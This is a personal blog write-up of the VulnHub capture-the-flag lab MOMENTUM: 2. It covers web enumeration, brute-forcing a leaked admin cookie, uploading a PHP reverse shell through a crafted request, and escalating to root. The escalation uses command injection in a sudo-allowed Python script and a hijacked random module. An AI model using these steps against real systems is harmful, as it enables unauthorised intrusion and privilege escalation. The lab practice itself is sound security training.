I was away again; but this time I didn’t even have a laptop. Still, I try to do something every day so I did a bit of OverTheWire on my phone. It’s hard to do some of it where you’re expected to resize a terminal window to take advantage of more or something like that, but Leviathan was doable and so I completed that. After that I got home again and did MOMENTUM: 2 from VulnHub.

Keywords : curl, bash, code review

It’s medium rated.


SSH and HTTP only.


We need to do some enumeration here; there are a few things we need to find:

  1. is where we can upload files,
  2. is where we find our uploaded content, and
  3. is where we find our code to review

The last one I found with:

feroxbuster -u -w /usr/share/seclists/Discovery/Web-Content/merged-file -C 403 -x php,bak --no-recursion 

What’s in our code?

 //The boss told me to add one more Upper Case letter at the end of the cookie
   if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){

       //[+] Add if $_POST['secure'] == 'val1d'
        $valid_ext = array("pdf","php","txt");

        $valid_ext = array("txt");

   // Remember success upload returns 1   

This is relatively simple. We need to set a cookie but also figure out what it needs to be, and add a new parameter to our POST request. Before finding this file I had tried to defeat the upload filtering to no avail. Considering we need that cookie and parameter, it’s no wonder.

I use Burp Suite Intruder to find the last character of the cookie - it is ‘R’. Then I construct this request:

POST /ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136110921536555815714284481441
Content-Length: 5842
Connection: close
Cookie: admin=&G6u@B6uDXMq&MsR

Content-Disposition: form-data; name="secure"; 

Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
# etc


At this point we’ve shelled the box and we get the password for our user:

www-data@momentum2:/home/athena$ ls -lash
ls -lash
total 32K
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 18:26 .
4.0K drwxr-xr-x 4 root   root   4.0K May 27 16:30 ..
4.0K -rw-r--r-- 1 athena athena  220 May 25 12:15 .bash_logout
4.0K -rw-r--r-- 1 athena athena 3.5K May 25 12:15 .bashrc
4.0K drwxr-xr-x 3 athena athena 4.0K May 27 16:58 .local
4.0K -rw-r--r-- 1 athena athena  807 May 25 12:15 .profile
4.0K -rw-r--r-- 1 athena athena   37 May 27 17:04 password-reminder.txt
4.0K -rw-r--r-- 1 root   root    241 May 27 17:09 user.txt
www-data@momentum2:/home/athena$ cat pas        
cat password-reminder.txt 
password : myvulnerableapp[Asterisk]
www-data@momentum2:/home/athena$ cat us
cat user.txt 
/                         \
~ Momentum 2 ~ User Owned ~
\                         /

FLAG : 4WpJT9qXoQwFGeoRoFBEJZiM2j2Ad33gWipzZkStMLHw

www-data@momentum2:/home/athena$ su athena
su athena
Password: myvulnerableapp*

athena@momentum2:~$ sudo -l
sudo -l
Matching Defaults entries for athena on momentum2:
    env_reset, mail_badpass,

User athena may run the following commands on momentum2:
    (root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py

How can we exploit this? Let’s inspect the code:

athena@momentum2:~$ cat /home/team-tasks/cookie-gen.py
cat /home/team-tasks/cookie-gen.py
import random
import os
import subprocess

print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')

seed = input("Enter the seed : ")
random.seed = seed

cookie = ''
for c in range(20):
    cookie += random.choice(chars)


cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)

We’ve got command injection on the ‘seed’ parameter, and I use it to create a new python random module:

athena@momentum2:~$ cd /home/team-tasks 
cd /home/team-tasks
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : 2;bash -c 'touch random.py && chmod 777 random.py'
2;bash -c 'touch random.py && chmod 777 random.py'
athena@momentum2:/home/team-tasks$ 2

athena@momentum2:/home/team-tasks$ printf 'import os\n' >> random.py
printf 'import os\n' >> random.py
athena@momentum2:/home/team-tasks$ printf 'os.system("/bin/bash");\n' >> random.py
<ks$ printf 'os.system("/bin/bash");\n' >> random.py
athena@momentum2:/home/team-tasks$ sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
<oot /usr/bin/python3 /home/team-tasks/cookie-gen.py
root@momentum2:/home/team-tasks# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Fri 09 Jul 2021 08:16:35 AM EDT